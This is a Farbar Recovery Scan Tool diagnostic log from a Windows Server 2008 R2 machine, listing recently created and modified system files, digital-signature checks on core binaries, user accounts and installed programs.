2017-06-29 08:40 - 2014-03-04 04:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2017-06-29 08:40 - 2014-03-04 04:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2017-06-29 08:40 - 2014-03-04 04:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2017-06-29 08:40 - 2014-03-04 04:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2017-06-29 08:40 - 2014-03-04 04:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2017-06-29 08:40 - 2014-03-04 04:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2017-06-29 08:40 - 2012-04-26 00:41 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\rdpwsx.dll
2017-06-29 08:40 - 2012-04-26 00:34 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\rdrmemptylst.exe
2017-06-29 08:39 - 2014-11-10 22:08 - 00241152 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll
2017-06-29 08:39 - 2014-11-10 21:44 - 00186880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll
2017-06-29 08:38 - 2016-05-11 12:02 - 00444928 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2017-06-29 08:38 - 2016-05-11 12:02 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll
2017-06-29 08:38 - 2016-05-11 12:02 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll
2017-06-29 08:38 - 2016-05-11 10:19 - 00351744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2017-06-29 08:38 - 2016-05-11 10:19 - 00231424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswsock.dll
2017-06-29 08:38 - 2016-05-11 10:19 - 00206336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ws2_32.dll
2017-06-29 08:38 - 2016-05-11 10:11 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\netbtugc.exe
2017-06-29 08:38 - 2016-05-11 10:01 - 00026624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netbtugc.exe
2017-06-29 08:38 - 2016-05-11 09:58 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2017-06-29 08:38 - 2015-07-10 12:51 - 03722752 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2017-06-29 08:38 - 2015-07-10 12:51 - 00158720 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2017-06-29 08:38 - 2015-07-10 12:51 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2017-06-29 08:38 - 2015-07-10 12:34 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2017-06-29 08:38 - 2015-07-10 12:34 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2017-06-29 08:38 - 2015-07-10 12:33 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2017-06-29 08:38 - 2015-04-12 22:28 - 00328704 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2017-06-29 08:38 - 2015-03-03 23:41 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\clfsw32.dll
2017-06-29 08:38 - 2015-03-03 23:10 - 00058880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clfsw32.dll
2017-06-29 08:38 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2017-06-29 08:38 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2017-06-29 08:38 - 2014-06-17 21:18 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2017-06-29 08:38 - 2014-06-17 20:51 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe
2017-06-29 08:38 - 2013-10-11 21:32 - 00150016 _____ (Microsoft Corporation) C:\Windows\system32\wshom.ocx
2017-06-29 08:38 - 2013-10-11 21:31 - 00202752 _____ (Microsoft Corporation) C:\Windows\system32\scrrun.dll
2017-06-29 08:38 - 2013-10-11 21:30 - 00830464 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2017-06-29 08:38 - 2013-10-11 21:29 - 00859648 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2017-06-29 08:38 - 2013-10-11 21:29 - 00324096 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2017-06-29 08:38 - 2013-10-11 21:04 - 00121856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshom.ocx
2017-06-29 08:38 - 2013-10-11 21:03 - 00656896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2017-06-29 08:38 - 2013-10-11 21:03 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scrrun.dll
2017-06-29 08:38 - 2013-10-11 21:01 - 00216576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2017-06-29 08:38 - 2013-10-11 20:33 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\wscript.exe
2017-06-29 08:38 - 2013-10-11 20:33 - 00156160 _____ (Microsoft Corporation) C:\Windows\system32\cscript.exe
2017-06-29 08:38 - 2013-10-11 20:15 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscript.exe
2017-06-29 08:38 - 2013-10-11 20:15 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cscript.exe
2017-06-29 08:38 - 2013-07-25 21:24 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\shdocvw.dll
2017-06-29 08:38 - 2013-07-25 20:55 - 00180224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shdocvw.dll
2017-06-29 08:38 - 2013-05-13 00:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\certenc.dll
2017-06-29 08:38 - 2013-05-12 22:43 - 01192448 _____ (Microsoft Corporation) C:\Windows\system32\certutil.exe
2017-06-29 08:38 - 2013-05-12 22:08 - 00903168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certutil.exe
2017-06-29 08:38 - 2013-05-12 22:08 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certenc.dll
2017-06-29 08:38 - 2012-06-01 00:39 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\wamregps.dll
2017-06-29 08:38 - 2012-06-01 00:36 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\iisRtl.dll
2017-06-29 08:38 - 2012-06-01 00:36 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\iisrstap.dll
2017-06-29 08:38 - 2012-06-01 00:35 - 00060928 _____ (Microsoft Corporation) C:\Windows\system32\ahadmin.dll
2017-06-29 08:38 - 2012-06-01 00:34 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\admwprox.dll
2017-06-29 08:38 - 2012-06-01 00:33 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\iisreset.exe
2017-06-29 08:38 - 2012-05-31 23:40 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wamregps.dll
2017-06-29 08:38 - 2012-05-31 23:37 - 00154624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iisRtl.dll
2017-06-29 08:38 - 2012-05-31 23:37 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iisrstap.dll
2017-06-29 08:38 - 2012-05-31 23:35 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\admwprox.dll
2017-06-29 08:38 - 2012-05-31 23:35 - 00026624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ahadmin.dll
2017-06-29 08:38 - 2012-05-31 23:34 - 00015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iisreset.exe
2017-06-29 08:38 - 2011-12-17 01:35 - 00625152 _____ (Microsoft Corporation) C:\Windows\system32\colorui.dll
2017-06-29 08:38 - 2011-12-17 00:41 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\colorui.dll
2017-06-29 08:38 - 2011-12-16 03:46 - 00634880 _____ (Microsoft Corporation) C:\Windows\system32\msvcrt.dll
2017-06-29 08:38 - 2011-12-16 02:52 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcrt.dll
2017-06-29 08:38 - 2011-06-15 05:02 - 00212992 _____ (Microsoft Corporation) C:\Windows\system32\odbctrac.dll
2017-06-29 08:38 - 2011-06-15 05:02 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\odbccp32.dll
2017-06-29 08:38 - 2011-06-15 05:02 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\odbccu32.dll
2017-06-29 08:38 - 2011-06-15 05:02 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\odbccr32.dll
2017-06-29 08:38 - 2011-06-15 03:55 - 00319488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbcjt32.dll
2017-06-29 08:38 - 2011-06-15 03:55 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbctrac.dll
2017-06-29 08:38 - 2011-06-15 03:55 - 00122880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbccp32.dll
2017-06-29 08:38 - 2011-06-15 03:55 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbccu32.dll
2017-06-29 08:38 - 2011-06-15 03:55 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbccr32.dll
2017-06-29 08:37 - 2016-06-25 19:27 - 00344576 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2017-06-29 08:37 - 2016-06-25 14:53 - 00297472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2017-06-29 08:37 - 2016-06-25 14:53 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2017-06-29 08:37 - 2016-06-25 14:41 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.exe
2017-06-29 08:37 - 2016-02-03 13:07 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2017-06-29 08:37 - 2016-01-22 01:17 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2017-06-29 08:37 - 2016-01-22 01:02 - 00176128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2017-06-29 08:37 - 2016-01-22 01:02 - 00114176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2017-06-29 08:37 - 2015-12-08 16:53 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2017-06-29 08:37 - 2015-12-08 14:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2017-06-29 08:37 - 2015-11-13 18:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2017-06-29 08:37 - 2015-11-13 18:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2017-06-29 08:37 - 2015-11-13 18:08 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\fixmapi.exe
2017-06-29 08:37 - 2015-11-13 17:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2017-06-29 08:37 - 2015-11-13 17:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2017-06-29 08:37 - 2015-11-13 17:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2017-06-29 08:37 - 2015-11-05 14:05 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\wshrm.dll
2017-06-29 08:37 - 2015-11-05 14:02 - 00014848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshrm.dll
2017-06-29 08:37 - 2015-11-05 04:53 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2017-06-29 08:37 - 2015-11-03 14:04 - 00241664 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2017-06-29 08:37 - 2015-11-03 13:55 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\els.dll
2017-06-29 08:37 - 2015-10-12 23:57 - 00950720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2017-06-29 08:37 - 2015-07-14 22:19 - 02004992 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2017-06-29 08:37 - 2015-07-14 22:14 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml6r.dll
2017-06-29 08:37 - 2015-07-14 21:55 - 01390592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2017-06-29 08:37 - 2015-07-14 21:51 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6r.dll
2017-06-29 08:37 - 2015-07-09 12:57 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\notepad.exe
2017-06-29 08:37 - 2015-07-09 12:42 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
2017-06-29 08:37 - 2015-02-24 22:18 - 00754688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2017-06-29 08:37 - 2014-12-05 23:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2017-06-29 08:37 - 2014-12-05 22:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2017-06-29 08:37 - 2014-12-05 22:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2017-06-29 08:37 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2017-06-29 08:37 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2017-06-29 08:37 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2017-06-29 08:37 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2017-06-29 08:37 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2017-06-29 08:37 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2017-06-29 08:37 - 2013-11-26 20:41 - 00343040 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2017-06-29 08:37 - 2013-11-26 20:41 - 00325120 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2017-06-29 08:37 - 2013-11-26 20:41 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2017-06-29 08:37 - 2013-11-26 20:41 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2017-06-29 08:37 - 2013-11-26 20:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2017-06-29 08:37 - 2013-11-26 20:41 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2017-06-29 08:37 - 2013-10-18 21:18 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\imagehlp.dll
2017-06-29 08:37 - 2013-10-18 20:36 - 00159232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imagehlp.dll
2017-06-29 08:37 - 2013-07-02 23:05 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidclass.sys
2017-06-29 08:37 - 2013-07-02 23:05 - 00032896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidparse.sys
2017-06-29 08:37 - 2013-06-25 17:55 - 00785624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2017-06-29 08:37 - 2013-04-12 09:45 - 01656680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-06-29 08:37 - 2013-02-11 23:12 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usb8023.sys
2017-06-29 08:37 - 2012-11-28 17:56 - 00054376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfLdr.sys
2017-06-29 08:37 - 2012-11-28 17:56 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\Wdfres.dll
2017-06-29 08:37 - 2012-11-28 17:56 - 00000003 _____ C:\Windows\system32\Drivers\MsftWdf_Kernel_01011_Inbox_Critical.Wdf
2017-06-29 08:37 - 2012-11-02 00:59 - 00478208 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2017-06-29 08:37 - 2012-11-02 00:11 - 00376832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2017-06-29 08:37 - 2012-10-03 12:44 - 00216576 _____ (Microsoft Corporation) C:\Windows\system32\ncsi.dll
2017-06-29 08:37 - 2012-10-03 12:44 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\nlaapi.dll
2017-06-29 08:37 - 2012-07-04 17:16 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\netapi32.dll
2017-06-29 08:37 - 2012-07-04 17:13 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\browser.dll
2017-06-29 08:37 - 2012-07-04 17:13 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\browcli.dll
2017-06-29 08:37 - 2012-07-04 16:16 - 00057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netapi32.dll
2017-06-29 08:37 - 2012-07-04 16:14 - 00041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\browcli.dll
2017-06-29 08:37 - 2012-02-17 01:38 - 01031680 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2017-06-29 08:37 - 2012-02-17 00:34 - 00826880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2017-06-29 08:37 - 2012-02-16 23:57 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdtcp.sys
2017-06-29 08:37 - 2011-02-05 12:10 - 00020352 _____ (Microsoft Corporation) C:\Windows\system32\kdusb.dll
2017-06-29 08:37 - 2011-02-05 12:10 - 00019328 _____ (Microsoft Corporation) C:\Windows\system32\kd1394.dll
2017-06-29 08:37 - 2011-02-05 12:10 - 00017792 _____ (Microsoft Corporation) C:\Windows\system32\kdcom.dll
2017-06-29 08:36 - 2015-06-09 14:34 - 00565760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2017-06-29 08:36 - 2015-06-09 13:03 - 00696832 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2017-06-29 08:36 - 2014-10-24 20:57 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2017-06-29 08:36 - 2014-10-24 20:32 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2017-06-29 08:36 - 2014-10-13 21:13 - 00683520 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2017-06-29 08:36 - 2012-11-22 22:13 - 00068608 _____ (Microsoft Corporation) C:\Windows\system32\taskhost.exe
2017-06-29 08:36 - 2012-11-02 01:01 - 00246272 _____ (Microsoft Corporation) C:\Windows\system32\netcorehc.dll
2017-06-29 08:36 - 2012-11-02 01:00 - 00569856 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2017-06-29 08:36 - 2012-11-02 00:15 - 00175104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcorehc.dll
2017-06-29 08:36 - 2011-05-24 06:42 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\umpnpmgr.dll
2017-06-29 08:36 - 2011-05-24 05:40 - 00064512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devobj.dll
2017-06-29 08:36 - 2011-05-24 05:40 - 00044544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devrtl.dll
2017-06-29 08:36 - 2011-05-24 05:39 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgmgr32.dll
2017-06-29 08:36 - 2011-05-24 05:37 - 00252928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drvinst.exe
2017-06-29 08:36 - 2011-03-03 01:24 - 00357888 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2017-06-29 08:36 - 2011-03-03 01:24 - 00183296 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2017-06-29 08:36 - 2011-03-03 01:21 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\dnscacheugc.exe
2017-06-29 08:36 - 2011-03-03 00:38 - 00270336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2017-06-29 08:36 - 2011-03-03 00:36 - 00028672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnscacheugc.exe
2017-06-29 08:35 - 2016-05-12 12:15 - 00105472 _____ (Microsoft Corporation) C:\Windows\system32\winipsec.dll
2017-06-29 08:35 - 2016-05-12 12:14 - 00794624 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2017-06-29 08:35 - 2016-05-12 12:14 - 00793088 _____ (Microsoft Corporation) C:\Windows\system32\gpprefcl.dll
2017-06-29 08:35 - 2016-05-12 12:14 - 00502272 _____ (Microsoft Corporation) C:\Windows\system32\IPSECSVC.DLL
2017-06-29 08:35 - 2016-05-12 12:14 - 00373760 _____ (Microsoft Corporation) C:\Windows\system32\polstore.dll
2017-06-29 08:35 - 2016-05-12 12:14 - 00096256 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2017-06-29 08:35 - 2016-05-12 12:14 - 00075776 _____ (Microsoft Corporation) C:\Windows\system32\FwRemoteSvr.dll
2017-06-29 08:35 - 2016-05-12 12:14 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\gpscript.dll
2017-06-29 08:35 - 2016-05-12 10:18 - 00591872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpprefcl.dll
2017-06-29 08:35 - 2016-05-12 10:18 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\polstore.dll
2017-06-29 08:35 - 2016-05-12 10:18 - 00079360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
2017-06-29 08:35 - 2016-05-12 10:18 - 00070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winipsec.dll
2017-06-29 08:35 - 2016-05-12 10:18 - 00044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FwRemoteSvr.dll
2017-06-29 08:35 - 2016-05-12 10:06 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\gpscript.exe
2017-06-29 08:35 - 2016-05-12 09:57 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpscript.dll
2017-06-29 08:35 - 2016-05-12 09:57 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpscript.exe
2017-06-29 08:35 - 2014-01-28 21:32 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2017-06-29 08:35 - 2014-01-28 21:06 - 00381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2017-06-29 08:35 - 2011-11-17 01:35 - 00395776 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2017-06-29 08:35 - 2011-11-17 00:35 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2017-06-29 08:35 - 2011-08-27 00:37 - 00331776 _____ (Microsoft Corporation) C:\Windows\system32\oleacc.dll
2017-06-29 08:35 - 2011-08-26 23:26 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleacc.dll
2017-06-29 08:35 - 2011-03-11 01:34 - 01395712 _____ (Microsoft Corporation) C:\Windows\system32\mfc42.dll
2017-06-29 08:35 - 2011-03-11 01:34 - 01359872 _____ (Microsoft Corporation) C:\Windows\system32\mfc42u.dll
2017-06-29 08:35 - 2011-03-11 00:33 - 01164288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42u.dll
2017-06-29 08:35 - 2011-03-11 00:33 - 01137664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42.dll
2017-06-29 08:22 - 2016-02-09 04:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2017-06-29 08:22 - 2016-01-08 13:56 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2017-06-29 08:22 - 2016-01-08 13:37 - 00192512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassam.dll
2017-06-29 08:22 - 2015-08-05 12:56 - 01110016 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2017-06-29 08:22 - 2015-02-02 22:31 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\ubpm.dll
2017-06-29 08:22 - 2015-02-02 22:12 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ubpm.dll
2017-06-29 08:21 - 2014-12-11 12:47 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2017-06-26 23:04 - 2017-06-26 23:04 - 00000005 _____ C:\Windows\system32\1.txt

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-06 07:40 - 2009-07-13 23:49 - 00021328 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-07-06 07:40 - 2009-07-13 23:49 - 00021328 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-07-06 07:23 - 2014-05-05 12:18 - 00000000 ____D C:\Users\FCAdmin\AppData\Local\VirtualStore
2017-07-05 23:03 - 2009-07-13 21:34 - 00000265 _____ C:\Windows\win.ini
2017-07-05 20:38 - 2009-07-14 00:10 - 00803816 _____ C:\Windows\system32\PerfStringBackup.INI
2017-07-05 20:38 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2017-06-29 11:56 - 2014-05-05 12:18 - 00001413 _____ C:\Users\FCAdmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-06-29 11:55 - 2014-05-05 14:04 - 00001413 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-06-29 11:38 - 2009-07-13 23:49 - 00263728 _____ C:\Windows\system32\FNTCACHE.DAT
2017-06-29 11:30 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\SysWOW64\inetsrv
2017-06-29 11:30 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\inetsrv
2017-06-29 11:29 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\SysWOW64\Dism
2017-06-29 11:29 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-06-29 11:28 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\Dism
2017-06-29 11:27 - 2009-07-13 22:20 - 00000000 ____D C:\Program Files\Common Files\System
2017-06-26 18:04 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache

==================== Files in the root of some directories =======

2015-01-29 10:54 - 2015-01-29 10:54 - 0000017 _____ () C:\Users\FCAdmin\AppData\Local\resmon.resmoncfg

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-02-06 19:07

==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 05-07-2017
Ran by FCAdmin (06-07-2017 08:32:59)
Running from C:\Users\FCAdmin\Downloads
Windows Server 2008 R2 Standard Service Pack 1 (X64) (2014-05-05 19:03:52)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3112712058-1343828553-617848957-500 - Administrator - Enabled) => C:\Users\Administrator
FCAdmin (S-1-5-21-3112712058-1343828553-617848957-1000 - Administrator - Enabled) => C:\Users\FCAdmin
Guest (S-1-5-21-3112712058-1343828553-617848957-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adaptec Storage Manager (HKLM\...\{7C3DAF8E-37AB-47D6-9157-ED9B56558341}) (Version: 7.30.00.18837 - PMC-Sierra, Inc.)
FirstClass Client (HKLM-x32\...\{3367D1F6-D572-4DAE-AF01-7F19B3965950}) (Version: 12.007 - OpenText)
Malwarebytes version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
